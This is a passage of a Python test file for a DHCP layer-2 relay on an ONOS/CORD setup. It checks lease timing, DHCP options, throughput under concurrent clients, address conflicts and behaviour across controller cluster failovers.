self.dhcp = DHCPTest(seed_ip = '20.20.20.45', iface = iface)
cip, sip, mac, _ = self.dhcp.only_discover(mac=mac)
new_cip, new_sip, lval = self.dhcp.only_request(cip, mac, lease_time = True,lease_value=lease_time)
assert_equal(new_cip,cip)
assert_equal(lval, lease_time)
log_test.info('Client-requested lease time in the request packet is seen in the server ACK packet, as expected')
@nottest
def test_dhcpl2relay_with_client_renew_time(self, iface = 'veth0'):
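# After the initial lease, wait for the renew (T1) interval returned by the server and
# confirm a unicast request still renews the same client IP.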
mac = self.get_mac(iface)
self.dhcp = DHCPTest(seed_ip = '20.20.20.45', iface = iface)
cip, sip, mac, _ = self.dhcp.only_discover(mac=mac)
log_test.info('Got dhcp client IP %s from server %s for mac %s .' %
(cip, sip, mac) )
assert_not_equal(cip,None)
new_cip, new_sip, lval = self.dhcp.only_request(cip, mac, renew_time = True)
log_test.info('waiting for renew time.. a= %s b= %s c= %s'%(new_cip,new_sip,lval))
time.sleep(lval)
latest_cip, latest_sip = self.dhcp.only_request(new_cip, mac, unicast = True)
assert_equal(latest_cip, cip)
log_test.info('server renewed client IP when client sends request after renew time, as expected')
@nottest
def test_dhcpl2relay_with_client_rebind_time(self, iface = 'veth0'):
mac = self.get_mac(iface)
self.dhcp = DHCPTest(seed_ip = '20.20.20.45', iface = iface)
cip, sip, mac, _ = self.dhcp.only_discover(mac=mac)
log_test.info('Got dhcp client IP %s from server %s for mac %s .' %
(cip, sip, mac) )
assert_not_equal(cip,None)
new_cip, new_sip, lval = self.dhcp.only_request(cip, mac, rebind_time = True)
log_test.info('waiting for rebind time..')
time.sleep(lval)
latest_cip, latest_sip = self.dhcp.only_request(new_cip, mac)
assert_equal(latest_cip, cip)
log_test.info('server renewed client IP when client sends request after rebind time, as expected')
def test_dhcpl2relay_with_client_expected_subnet_mask(self, iface = 'veth0'):
mac = self.get_mac(iface)
self.dhcp = DHCPTest(seed_ip = '20.20.20.45', iface = iface)
expected_subnet = '255.255.255.0'
self.dhcp.return_option = 'subnet'
cip, sip, mac, subnet_mask = self.dhcp.only_discover(mac=mac)
log_test.info('Got dhcp client IP %s from server %s for mac %s .' %
(cip, sip, mac) )
assert_equal(subnet_mask,expected_subnet)
log_test.info('subnet mask in server offer packet is same as configured subnet mask in dhcp server')
def test_dhcpl2relay_with_client_sending_dhcp_request_with_wrong_subnet_mask(self, iface = 'veth0'):
mac = self.get_mac(iface)
self.dhcp = DHCPTest(seed_ip = '20.20.20.45', iface = iface)
cip, sip, mac, _ = self.dhcp.only_discover(mac=mac)
log_test.info('Got dhcp client IP %s from server %s for mac %s .' %
(cip, sip, mac) )
assert_not_equal(cip,None)
self.dhcp.send_different_option = 'subnet'
new_cip, new_sip = self.dhcp.only_request(cip, mac)
assert_equal(new_cip, cip)
log_test.info("Got DHCP Ack despite of specifying wrong Subnet Mask in DHCP Request.")
@nottest
def test_dhcpl2relay_with_client_expected_router_address(self, iface = 'veth0'):
mac = self.get_mac(iface)
self.dhcp = DHCPTest(seed_ip = '20.20.20.45', iface = iface)
expected_router_address = '20.20.20.1'
self.dhcp.return_option = 'router'
cip, sip, mac, router_address_value = self.dhcp.only_discover(mac=mac)
log_test.info('Got dhcp client IP %s from server %s for mac %s .' %
(cip, sip, mac) )
assert_equal(expected_router_address, router_address_value)
log_test.info('router address in server offer packet is same as configured router address in dhcp server')
@nottest
def test_dhcpl2relay_with_client_sends_dhcp_request_with_wrong_router_address(self, iface = 'veth0'):
mac = self.get_mac(iface)
self.dhcp = DHCPTest(seed_ip = '20.20.20.45', iface = iface)
cip, sip, mac, _ = self.dhcp.only_discover(mac=mac)
log_test.info('Got dhcp client IP %s from server %s for mac %s .' %
(cip, sip, mac) )
assert_not_equal(cip,None)
self.dhcp.send_different_option = 'router'
new_cip, new_sip = self.dhcp.only_request(cip, mac)
assert_equal(new_cip, cip)
log_test.info("Got DHCP Ack despite of specifying wrong Router Address in DHCP Request.")
def test_dhcpl2relay_with_client_expecting_broadcast_address(self, iface = 'veth0'):
mac = self.get_mac(iface)
self.dhcp = DHCPTest(seed_ip = '20.20.20.45', iface = iface)
expected_broadcast_address = '192.168.1.255'
self.dhcp.return_option = 'broadcast_address'
cip, sip, mac, broadcast_address_value = self.dhcp.only_discover(mac=mac)
log_test.info('Got dhcp client IP %s from server %s for mac %s .' %
(cip, sip, mac) )
assert_equal(expected_broadcast_address, broadcast_address_value)
log_test.info('broadcast address in server offer packet is same as configured broadcast address in dhcp server')
def test_dhcpl2relay_by_client_sending_dhcp_request_with_wrong_broadcast_address(self, iface = 'veth0'):
mac = self.get_mac(iface)
self.dhcp = DHCPTest(seed_ip = '20.20.20.45', iface = iface)
cip, sip, mac, _ = self.dhcp.only_discover(mac=mac)
log_test.info('Got dhcp client IP %s from server %s for mac %s .' %
(cip, sip, mac) )
assert_not_equal(cip,None)
self.dhcp.send_different_option = 'broadcast_address'
new_cip, new_sip = self.dhcp.only_request(cip, mac)
assert_equal(new_cip, cip)
log_test.info("Got DHCP Ack despite of specifying wrong Broadcast Address in DHCP Request.")
def test_dhcpl2relay_with_client_expecting_dns_address(self, iface = 'veth0'):
mac = self.get_mac(iface)
self.dhcp = DHCPTest(seed_ip = '20.20.20.45', iface = iface)
expected_dns_address = '192.168.1.1'
self.dhcp.return_option = 'dns'
cip, sip, mac, dns_address_value = self.dhcp.only_discover(mac=mac)
log_test.info('Got dhcp client IP %s from server %s for mac %s .' %
(cip, sip, mac) )
assert_equal(expected_dns_address, dns_address_value)
log_test.info('dns address in server offer packet is same as configured dns address in dhcp server')
def test_dhcpl2relay_by_client_sending_request_with_wrong_dns_address(self, iface = 'veth0'):
mac = self.get_mac(iface)
self.dhcp = DHCPTest(seed_ip = '20.20.20.45', iface = iface)
cip, sip, mac, _ = self.dhcp.only_discover(mac=mac)
log_test.info('Got dhcp client IP %s from server %s for mac %s .' %
(cip, sip, mac) )
assert_not_equal(cip,None)
self.dhcp.send_different_option = 'dns'
new_cip, new_sip = self.dhcp.only_request(cip, mac)
assert_equal(new_cip, cip)
log_test.info("Got DHCP Ack despite of specifying wrong DNS Address in DHCP Request.")
def test_dhcpl2relay_transactions_per_second(self, iface = 'veth0'):
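# Run the dhcpl2relay_stats_calc() helper three times and log per-run and aggregate
# transaction counts, success/failure totals and transactions per second.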
for i in range(1,4):
self.dhcpl2relay_stats_calc()
log_test.info("Statistics for run %d",i)
log_test.info("----------------------------------------------------------------------------------")
log_test.info("No. of transactions No. of successes No. of failures Running Time ")
log_test.info(" %d %d %d %d" %(self.ip_count+self.failure_count, self.ip_count, self.failure_count, self.diff))
log_test.info("----------------------------------------------------------------------------------")
log_test.info("No. of transactions per second in run %d:%f" %(i, self.transaction_count))
log_test.info("Final Statistics for total transactions")
log_test.info("----------------------------------------------------------------------------------")
log_test.info("Total transactions Total No. of successes Total No. of failures Running Time ")
log_test.info(" %d %d %d %d" %(self.transactions,
self.total_success, self.total_failure, self.running_time))
log_test.info("----------------------------------------------------------------------------------")
log_test.info("Average no. of transactions per second: %d", round(self.transactions/self.running_time,0))
def test_dhcpl2relay_consecutive_successes_per_second(self, iface = 'veth0'):
for i in range(1,4):
self.dhcpl2relay_stats_calc(success_rate = True)
log_test.info("Statistics for run %d",i)
log_test.info("----------------------------------------------------------------------------------")
log_test.info("No. of consecutive successful transactions Running Time ")
log_test.info(" %d %d " %(self.ip_count, self.diff))
log_test.info("----------------------------------------------------------------------------------")
log_test.info("No. of successful transactions per second in run %d:%f" %(i, self.transaction_count))
log_test.info("----------------------------------------------------------------------------------")
log_test.info("Final Statistics for total successful transactions")
log_test.info("----------------------------------------------------------------------------------")
log_test.info("Total transactions Total No. of consecutive successes Running Time ")
log_test.info(" %d %d %d " %(self.transactions,
self.total_success, self.running_time))
log_test.info("----------------------------------------------------------------------------------")
log_test.info("Average no. of consecutive successful transactions per second: %d", round(self.total_success/self.running_time,0))
log_test.info("----------------------------------------------------------------------------------")
def test_dhcpl2relay_with_max_clients_per_second(self, iface = 'veth0'):
for i in range(1,4):
self.dhcpl2relay_stats_calc(only_discover = True)
log_test.info("----------------------------------------------------------------------------------")
log_test.info("Statistics for run %d of sending only DHCP Discover",i)
log_test.info("----------------------------------------------------------------------------------")
log_test.info("No. of transactions No. of successes No. of failures Running Time ")
log_test.info(" %d %d %d %d" %(self.ip_count+self.failure_count, self.ip_count, self.failure_count, self.diff))
log_test.info("----------------------------------------------------------------------------------")
log_test.info("No. of clients per second in run %d:%f "
%(i, self.transaction_count))
log_test.info("----------------------------------------------------------------------------------")
log_test.info("Final Statistics for total transactions of sending only DHCP Discover")
log_test.info("----------------------------------------------------------------------------------")
log_test.info("Total transactions Total No. of successes Total No. of failures Running Time ")
log_test.info(" %d %d %d %d" %(self.transactions,
self.total_success, self.total_failure, self.running_time))
log_test.info("----------------------------------------------------------------------------------")
log_test.info("Average no. of clients per second: %d ",
round(self.transactions/self.running_time,0))
log_test.info("----------------------------------------------------------------------------------")
def test_dhcpl2relay_consecutive_successful_clients_per_second(self, iface = 'veth0'):
for i in range(1,4):
self.dhcpl2relay_stats_calc(success_rate = True, only_discover = True)
log_test.info("----------------------------------------------------------------------------------")
log_test.info("Statistics for run %d for sending only DHCP Discover",i)
log_test.info("----------------------------------------------------------------------------------")
log_test.info("No. of consecutive successful transactions Running Time ")
log_test.info(" %d %d " %(self.ip_count, self.diff))
log_test.info("----------------------------------------------------------------------------------")
log_test.info("No. of consecutive successful clients per second in run %d:%f" %(i, self.transaction_count))
log_test.info("----------------------------------------------------------------------------------")
log_test.info("Final Statistics for total successful transactions")
log_test.info("----------------------------------------------------------------------------------")
log_test.info("Total transactions Total No. of consecutive successes Running Time ")
log_test.info(" %d %d %d " %(self.transactions,
self.total_success, self.running_time))
log_test.info("----------------------------------------------------------------------------------")
log_test.info("Average no. of consecutive successful clients per second: %d", round(self.total_success/self.running_time,0))
log_test.info("----------------------------------------------------------------------------------")
def test_dhcpl2relay_concurrent_transactions_per_second(self, iface = 'veth0'):
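# Load hosts on the first set of subscriber ports, then for three 60-second runs spawn
# six worker threads at a time, each performing a DHCP discover/request on a randomly
# chosen veth interface, and log per-run and aggregate throughput.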
for key in (key for key in g_subscriber_port_map if key < 100):
self.host_load(g_subscriber_port_map[key])
def thread_fun(i):
mac = self.get_mac('veth{}'.format(i))
cip, sip = DHCPTest(iface = 'veth{}'.format(i)).discover(mac = mac)
log_test.info('Got dhcp client IP %s from server %s for mac %s'%(cip, sip, mac))
self.lock.acquire()
if cip:
self.ip_count += 1
elif cip is None:
self.failure_count += 1
self.lock.notify_all()
self.lock.release()
for i in range (1,4):
self.ip_count = 0
self.failure_count = 0
self.start_time = 0
self.diff = 0
self.transaction_count = 0
self.start_time = time.time()
while self.diff <= 60:
t = threading.Thread(target = thread_fun, kwargs = {'i': random.randrange(0, random.randrange(1,40,1), 1)})
t1 = threading.Thread(target = thread_fun, kwargs = {'i': random.randrange(42, random.randrange(43,80,1), 1)})
t2 = threading.Thread(target = thread_fun, kwargs = {'i': random.randrange(82, random.randrange(83,120,1), 1)})
t3 = threading.Thread(target = thread_fun, kwargs = {'i': random.randrange(122, random.randrange(123,160,1), 1)})
t4 = threading.Thread(target = thread_fun, kwargs = {'i': random.randrange(162, random.randrange(163,180,1), 1)})
t5 = threading.Thread(target = thread_fun, kwargs = {'i': random.randrange(182, random.randrange(183,196,1), 1)})
t.start()
t1.start()
t2.start()
t3.start()
t4.start()
t5.start()
t.join()
t1.join()
t2.join()
t3.join()
t4.join()
t5.join()
self.diff = round(time.time() - self.start_time, 0)
self.transaction_count = round((self.ip_count+self.failure_count)/self.diff, 2)
self.transactions += (self.ip_count+self.failure_count)
self.running_time += self.diff
self.total_success += self.ip_count
self.total_failure += self.failure_count
log_test.info("----------------------------------------------------------------------------------")
log_test.info("Statistics for run %d",i)
log_test.info("----------------------------------------------------------------------------------")
log_test.info("No. of transactions No. of successes No. of failures Running Time ")
log_test.info(" %d %d %d %d"
%(self.ip_count+self.failure_count,self.ip_count, self.failure_count, self.diff))
log_test.info("----------------------------------------------------------------------------------")
log_test.info("No. of transactions per second in run %d:%f" %(i, self.transaction_count))
log_test.info("----------------------------------------------------------------------------------")
log_test.info("----------------------------------------------------------------------------------")
log_test.info("Final Statistics for total transactions")
log_test.info("----------------------------------------------------------------------------------")
log_test.info("Total transactions Total No. of successes Total No. of failures Running Time ")
log_test.info(" %d %d %d %d" %(self.transactions,
self.total_success, self.total_failure, self.running_time))
log_test.info("----------------------------------------------------------------------------------")
log_test.info("Average no. of transactions per second: %d", round(self.transactions/self.running_time,0))
log_test.info("----------------------------------------------------------------------------------")
@nottest
def test_dhcpl2relay_concurrent_consecutive_successes_per_second(self, iface = 'veth0'):
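# Similar to the concurrent transaction test above, but each worker keeps sending
# discovers with random MACs until it sees a failure; a run ends once all six workers
# have recorded a failure.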
failure_dir = {}
for key in (key for key in g_subscriber_port_map if key != 100):
self.host_load(g_subscriber_port_map[key])
def thread_fun(i, j):
# log_test.info("Thread Name:%s",current_thread().name)
# failure_dir[current_thread().name] = True
while failure_dir.has_key(current_thread().name) is False:
mac = RandMAC()._fix()
cip, sip = DHCPTest(iface = 'veth{}'.format(i)).discover(mac = mac)
i += 2
log_test.info('Got dhcp client IP %s from server %s for mac %s'%(cip, sip, mac))
self.lock.acquire()
if cip:
self.ip_count += 1
self.lock.notify_all()
self.lock.release()
elif cip is None:
self.failure_count += 1
failure_dir[current_thread().name] = True
self.lock.notify_all()
self.lock.release()
break
# self.lock.notify_all()
# self.lock.release()
for i in range (1,4):
failure_dir = {}
self.ip_count = 0
self.failure_count = 0
self.start_time = 0
self.diff = 0
self.transaction_count = 0
self.start_time = time.time()
while len(failure_dir) != 6:
t = threading.Thread(target = thread_fun, kwargs = {'i': 0, 'j': 2})
t1 = threading.Thread(target = thread_fun, kwargs = {'i': 0, 'j': 2})
t2 = threading.Thread(target = thread_fun, kwargs = {'i': 0, 'j': 2})
t3 = threading.Thread(target = thread_fun, kwargs = {'i': 0, 'j': 2})
t4 = threading.Thread(target = thread_fun, kwargs = {'i': 0, 'j': 2})
t5 = threading.Thread(target = thread_fun, kwargs = {'i': 0, 'j': 2})
t.start()
t1.start()
t2.start()
t3.start()
t4.start()
t5.start()
t.join()
t1.join()
t2.join()
t3.join()
t4.join()
t5.join()
self.diff = round(time.time() - self.start_time, 0)
self.transaction_count = round((self.ip_count)/self.diff, 2)
self.transactions += (self.ip_count+self.failure_count)
self.running_time += self.diff
self.total_success += self.ip_count
self.total_failure += self.failure_count
log_test.info("Statistics for run %d",i)
log_test.info("----------------------------------------------------------------------------------")
log_test.info("No. of consecutive successful transactions Running Time ")
log_test.info(" %d %d " %(self.ip_count, self.diff))
log_test.info("----------------------------------------------------------------------------------")
log_test.info("No. of successful transactions per second in run %d:%f" %(i, self.transaction_count))
log_test.info("----------------------------------------------------------------------------------")
log_test.info("Final Statistics for total successful transactions")
log_test.info("----------------------------------------------------------------------------------")
log_test.info("Total transactions Total No. of consecutive successes Running Time ")
log_test.info(" %d %d %d " %(self.transactions,
self.total_success, self.running_time))
log_test.info("----------------------------------------------------------------------------------")
log_test.info("Average no. of consecutive successful transactions per second: %d", round(self.total_success/self.running_time,2))
log_test.info("----------------------------------------------------------------------------------")
@nottest
def test_dhcpl2relay_for_concurrent_clients_per_second(self, iface = 'veth0'):
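# Same threading pattern as the concurrent transaction test, but each worker only sends
# a DHCP discover (no request), measuring how many clients receive offers per second.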
for key in (key for key in g_subscriber_port_map if key < 100):
self.host_load(g_subscriber_port_map[key])
def thread_fun(i):
# mac = self.get_mac('veth{}'.format(i))
cip, sip, mac, _ = DHCPTest(iface = 'veth{}'.format(i)).only_discover(mac = RandMAC()._fix())
log_test.info('Got dhcp client IP %s from server %s for mac %s'%(cip, sip, mac))
self.lock.acquire()
if cip:
self.ip_count += 1
elif cip is None:
self.failure_count += 1
self.lock.notify_all()
self.lock.release()
for i in range (1,4):
self.ip_count = 0
self.failure_count = 0
self.start_time = 0
self.diff = 0
self.transaction_count = 0
self.start_time = time.time()
while self.diff <= 60:
t = threading.Thread(target = thread_fun, kwargs = {'i': random.randrange(0, random.randrange(1,40,1), 1)})
t1 = threading.Thread(target = thread_fun, kwargs = {'i': random.randrange(42, random.randrange(43,80,1), 1)})
t2 = threading.Thread(target = thread_fun, kwargs = {'i': random.randrange(82, random.randrange(83,120,1), 1)})
t3 = threading.Thread(target = thread_fun, kwargs = {'i': random.randrange(122, random.randrange(123,160,1), 1)})
t4 = threading.Thread(target = thread_fun, kwargs = {'i': random.randrange(162, random.randrange(163,180,1), 1)})
t5 = threading.Thread(target = thread_fun, kwargs = {'i': random.randrange(182, random.randrange(183,196,1), 1)})
t.start()
t1.start()
t2.start()
t3.start()
t4.start()
t5.start()
t.join()
t1.join()
t2.join()
t3.join()
t4.join()
t5.join()
self.diff = round(time.time() - self.start_time, 0)
self.transaction_count = round((self.ip_count+self.failure_count)/self.diff, 2)
self.transactions += (self.ip_count+self.failure_count)
self.running_time += self.diff
self.total_success += self.ip_count
self.total_failure += self.failure_count
log_test.info("----------------------------------------------------------------------------------")
log_test.info("Statistics for run %d of sending only DHCP Discover",i)
log_test.info("----------------------------------------------------------------------------------")
log_test.info("No. of transactions No. of successes No. of failures Running Time ")
log_test.info(" %d %d %d %d" %(self.ip_count+self.failure_count, self.ip_count, self.failure_count, self.diff))
log_test.info("----------------------------------------------------------------------------------")
log_test.info("No. of clients per second in run %d:%f "
%(i, self.transaction_count))
log_test.info("----------------------------------------------------------------------------------")
log_test.info("Final Statistics for total transactions of sending only DHCP Discover")
log_test.info("----------------------------------------------------------------------------------")
log_test.info("Total transactions Total No. of successes Total No. of failures Running Time ")
log_test.info(" %d %d %d %d" %(self.transactions,
self.total_success, self.total_failure, self.running_time))
log_test.info("----------------------------------------------------------------------------------")
log_test.info("Average no. of clients per second: %d ",
round(self.transactions/self.running_time,0))
log_test.info("----------------------------------------------------------------------------------")
@nottest
def test_dhcpl2relay_with_client_conflict(self, iface = 'veth0'):
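# Obtain an offer for one client, let a second client take that same address, then send
# the original client's request and expect the server to refuse it (no ACK).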
mac = self.get_mac(iface)
self.host_load(iface)
self.dhcp = DHCPTest(seed_ip = '10.10.10.1', iface = iface)
cip, sip, mac, _ = self.dhcp.only_discover()
log_test.info('Got dhcp client IP %s from server %s for mac %s.' %
(cip, sip, mac) )
self.dhcp1 = DHCPTest(seed_ip = cip, iface = iface)
new_cip, new_sip, new_mac, _ = self.dhcp1.only_discover(desired = True)
new_cip, new_sip = self.dhcp1.only_request(new_cip, new_mac)
log_test.info('Got dhcp client IP %s from server %s for mac %s.' %
(new_cip, new_sip, new_mac) )
log_test.info("IP %s alredy consumed by mac %s." % (new_cip, new_mac))
log_test.info("Now sending DHCP Request for old DHCP discover.")
new_cip, new_sip = self.dhcp.only_request(cip, mac)
if new_cip is None:
log_test.info('Got dhcp client IP %s from server %s for mac %s, which is the expected behavior.'
%(new_cip, new_sip, new_mac) )
elif new_cip:
log_test.info('Got dhcp client IP %s from server %s for mac %s, which is not expected behavior as IP %s is already consumed.'
%(new_cip, new_sip, new_mac, new_cip) )
assert_equal(new_cip, None)
##### All cluster scenarios for dhcpl2relay have to be validated on a voltha setup with a real DHCP client and server.
@nottest
def test_dhcpl2relay_releasing_dhcp_ip_after_cluster_master_change(self, iface = 'veth0',onos_instances=ONOS_INSTANCES):
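# Cluster scenario: get a lease, move ONOS mastership for the relay device to a standby,
# then release the lease and verify the same IP comes back on rediscover; mastership is
# restored to the original master in the finally block.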
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
master,standbys = self.get_cluster_current_master_standbys(device_id=self.relay_device_id)
assert_equal(len(standbys),(onos_instances-1))
mac = self.get_mac(iface)
self.cord_l2_relay_load
self.dhcp = DHCPTest(seed_ip = '10.10.10.1', iface = iface)
cip, sip = self.send_recv(mac=mac)
log_test.info('Changing cluster current master from %s to %s'%(master, standbys[0]))
self.change_master_current_cluster(device_id = self.relay_device_id,new_master=standbys[0])
self.cord_l2_relay_load
log_test.info('Releasing ip %s to server %s' %(cip, sip))
try:
assert_equal(self.dhcp.release(cip), True)
log_test.info('Triggering DHCP discover again after release')
self.cord_l2_relay_load
cip2, sip2 = self.send_recv(mac=mac)
log_test.info('Verifying released IP was given back on rediscover')
assert_equal(cip, cip2)
log_test.info('Test done. Releasing ip %s to server %s' %(cip2, sip2))
assert_equal(self.dhcp.release(cip2), True)
finally:
self.change_master_current_cluster(device_id = self.relay_device_id,new_master=master)
@nottest
def test_dhcpl2relay_releasing_dhcp_ip_after_cluster_master_withdraw_membership(self, iface = 'veth0',onos_instances=ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
master,standbys = self.get_cluster_current_member_ips(device_id=self.relay_device_id)
assert_equal(len(standbys),(onos_instances-1))
mac = self.get_mac(iface)
self.cord_l2_relay_load
self.dhcp = DHCPTest(seed_ip = '10.10.10.1', iface = iface)
cip, sip = self.send_recv(mac=mac)
log_test.info('Changing cluster current master from %s to %s'%(master, standbys[0]))
self.withdraw_cluster_current_mastership(device_id = self.relay_device_id,master_ip=master)
self.cord_l2_relay_load
log_test.info('Releasing ip %s to server %s' %(cip, sip))
try:
assert_equal(self.dhcp.release(cip), True)
log_test.info('Triggering DHCP discover again after release')
self.cord_l2_relay_load
cip2, sip2 = self.send_recv(mac=mac)
log_test.info('Verifying released IP was given back on rediscover')
assert_equal(cip, cip2)
log_test.info('Test done. Releasing ip %s to server %s' %(cip2, sip2))
assert_equal(self.dhcp.release(cip2), True)
finally:
self.change_master_current_cluster(device_id = self.relay_device_id,new_master=master)
@nottest
def test_dhcpl2relay_releasing_dhcp_ip_after_restart_cluster(self, iface = 'veth0',onos_instances=ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
master,standbys = self.get_cluster_current_master_standbys(device_id=self.relay_device_id)
assert_equal(len(standbys),(onos_instances-1))
mac = self.get_mac(iface)
self.cord_l2_relay_load
self.dhcp = DHCPTest(seed_ip = '10.10.10.1', iface = iface)
cip, sip = self.send_recv(mac=mac)
log_test.info('Restarting cluster whose master cluster= %s standby = %s'%(master, standbys))
self.cord_test_onos_restart()
self.cord_l2_relay_load
log_test.info('Releasing ip %s to server %s' %(cip, sip))
try:
assert_equal(self.dhcp.release(cip), True)
log_test.info('Triggering DHCP discover again after release')
self.cord_l2_relay_load
cip2, sip2 = self.send_recv(mac=mac)
log_test.info('Verifying released IP was given back on rediscover')
assert_equal(cip, cip2)
log_test.info('Test done. Releasing ip %s to server %s' %(cip2, sip2))
assert_equal(self.dhcp.release(cip2), True)
finally:
self.change_master_current_cluster(device_id = self.relay_device_id,new_master=master)
@nottest
def test_dhcpl2relay_releasing_dhcp_ip_after_cluster_master_down(self, iface = 'veth0',onos_instances=ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
master,standbys = self.get_cluster_current_master_standbys(device_id=self.relay_device_id)
assert_equal(len(standbys),(onos_instances-1))
mac = self.get_mac(iface)
self.cord_l2_relay_load
self.dhcp = DHCPTest(seed_ip = '10.10.10.1', iface = iface)
cip, sip = self.send_recv(mac=mac)
log_test.info('Restarting cluster whose master cluster= %s standby = %s'%(master, standbys))
cord_test_onos_shutdown(node = master)
self.cord_l2_relay_load
log_test.info('Releasing ip %s to server %s' %(cip, sip))
try:
assert_equal(self.dhcp.release(cip), True)
log_test.info('Triggering DHCP discover again after release')
self.cord_l2_relay_load
cip2, sip2 = self.send_recv(mac=mac)
log_test.info('Verifying released IP was given back on rediscover')
assert_equal(cip, cip2)
log_test.info('Test done. Releasing ip %s to server %s' %(cip2, sip2))
assert_equal(self.dhcp.release(cip2), True)
finally:
self.change_master_current_cluster(device_id = self.relay_device_id,new_master=master)
@nottest
def test_dhcpl2relay_releasing_dhcp_ip_after_cluster_standby_down(self, iface = 'veth0',onos_instances=ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
master,standbys = self.get_cluster_current_master_standbys(device_id=self.relay_device_id)
assert_equal(len(standbys),(onos_instances-1))
mac = self.get_mac(iface)
self.cord_l2_relay_load
self.dhcp = DHCPTest(seed_ip = '10.10.10.1', iface = iface)
cip, sip = self.send_recv(mac=mac)
log_test.info('Changing cluster current master from %s to %s'%(master, standbys[0]))
cord_test_onos_shutdown(node = standbys[0])
self.cord_l2_relay_load
log_test.info('Releasing ip %s to server %s' %(cip, sip))
try:
assert_equal(self.dhcp.release(cip), True)
log_test.info('Triggering DHCP discover again after release')
self.cord_l2_relay_load
cip2, sip2 = self.send_recv(mac=mac)
log_test.info('Verifying released IP was given back on rediscover')
assert_equal(cip, cip2)
log_test.info('Test done. Releasing ip %s to server %s' %(cip2, sip2))
assert_equal(self.dhcp.release(cip2), True)
finally:
self.change_master_current_cluster(device_id = self.relay_device_id,new_master=master)
@nottest
def test_dhcpl2relay_releasing_dhcp_ip_after_adding_two_members_to_cluster(self, iface = 'veth0',onos_instances=ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
master,standbys = self.get_cluster_current_master_standbys(device_id=self.relay_device_id)
assert_equal(len(standbys),(onos_instances-1))
mac = self.get_mac(iface)
self.cord_l2_relay_load
self.dhcp = DHCPTest(seed_ip = '10.10.10.1', iface = iface)
cip, sip = self.send_recv(mac=mac)
log_test.info('Changing cluster current master from %s to %s'%(master, standbys[0]))
cord_test_onos_shutdown(node = standbys[0])
self.cord_l2_relay_load
log_test.info('Releasing ip %s to server %s' %(cip, sip))
try:
assert_equal(self.dhcp.release(cip), True)
log_test.info('Triggering DHCP discover again after release')
self.cord_l2_relay_load
cip2, sip2 = self.send_recv(mac=mac)
log_test.info('Verifying released IP was given back on rediscover')
assert_equal(cip, cip2)
log_test.info('Test done. Releasing ip %s to server %s' %(cip2, sip2))
assert_equal(self.dhcp.release(cip2), True)
finally:
self.change_master_current_cluster(device_id = self.relay_device_id,new_master=master)
@nottest
def test_dhcpl2relay_releasing_dhcp_ip_after_restart_cluster_for_10_times(self, iface = 'veth0',onos_instances=ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
master,standbys = self.get_cluster_current_master_standbys(device_id=self.relay_device_id)
assert_equal(len(standbys),(onos_instances-1))
mac = self.get_mac(iface)
self.cord_l2_relay_load
self.dhcp = DHCPTest(seed_ip = '10.10.10.1', iface = iface)
cip, sip = self.send_recv(mac=mac)
log_test.info('Restarting cluster whose master cluster= %s standby = %s'%(master, standbys))
for i in range(10):
self.cord_test_onos_restart()
self.cord_l2_relay_load
log_test.info('Releasing ip %s to server %s' %(cip, sip))
try:
assert_equal(self.dhcp.release(cip), True)
log_test.info('Triggering DHCP discover again after release')
self.cord_l2_relay_load
cip2, sip2 = self.send_recv(mac=mac)
log_test.info('Verifying released IP was given back on rediscover')
assert_equal(cip, cip2)
log_test.info('Test done. Releasing ip %s to server %s' %(cip2, sip2))
assert_equal(self.dhcp.release(cip2), True)
finally:
self.change_master_current_cluster(device_id = self.relay_device_id,new_master=master)
@nottest
def test_dhcpl2relay_on_cluster_with_master_controller_only_restarts(self, iface = 'veth0',onos_instances=ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
master,standbys = self.get_cluster_current_master_standbys(device_id=self.relay_device_id)
assert_equal(len(standbys),(onos_instances-1))
mac = self.get_mac(iface)
self.cord_l2_relay_load
self.dhcp = DHCPTest(seed_ip = '10.10.10.1', iface = iface)
cip, sip = self.send_recv(mac=mac)
log_test.info('Restarting cluster whose master cluster= %s standby = %s'%(master, standbys))
self.cord_test_onos_restart(node = master)
self.cord_l2_relay_load
log_test.info('Releasing ip %s to server %s' %(cip, sip))
try:
assert_equal(self.dhcp.release(cip), True)
log_test.info('Triggering DHCP discover again after release')
self.cord_l2_relay_load
cip2, sip2 = self.send_recv(mac=mac)
log_test.info('Verifying released IP was given back on rediscover')
assert_equal(cip, cip2)
log_test.info('Test done. Releasing ip %s to server %s' %(cip2, sip2))
assert_equal(self.dhcp.release(cip2), True)
finally:
self.change_master_current_cluster(device_id = self.relay_device_id,new_master=master)
@nottest
def test_dhcpl2relay_on_cluster_with_standby_controller_only_restarts(self, iface = 'veth0',onos_instances=ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
master,standbys = self.get_cluster_current_master_standbys(device_id=self.relay_device_id)
assert_equal(len(standbys),(onos_instances-1))
mac = self.get_mac(iface)
self.cord_l2_relay_load
self.dhcp = DHCPTest(seed_ip = '10.10.10.1', iface = iface)
cip, sip = self.send_recv(mac=mac)
log_test.info('Restarting cluster whose master cluster= %s standby = %s'%(master, standbys))
self.cord_test_onos_restart(node = standbys[0])
self.cord_l2_relay_load
log_test.info('Releasing ip %s to server %s' %(cip, sip))
try:
assert_equal(self.dhcp.release(cip), True)
log_test.info('Triggering DHCP discover again after release')
self.cord_l2_relay_load
cip2, sip2 = self.send_recv(mac=mac)
log_test.info('Verifying released IP was given back on rediscover')
assert_equal(cip, cip2)
log_test.info('Test done. Releasing ip %s to server %s' %(cip2, sip2))
assert_equal(self.dhcp.release(cip2), True)
finally:
self.change_master_current_cluster(device_id = self.relay_device_id,new_master=master)
@nottest
def test_dhcpl2relay_by_removing_master_onos_instance(self, iface = 'veth0',onos_instances=ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
master,standbys = self.get_cluster_current_member_ips(device_id=self.relay_device_id)
assert_equal(len(standbys),(onos_instances-1))
mac = self.get_mac(iface)
self.cord_l2_relay_load
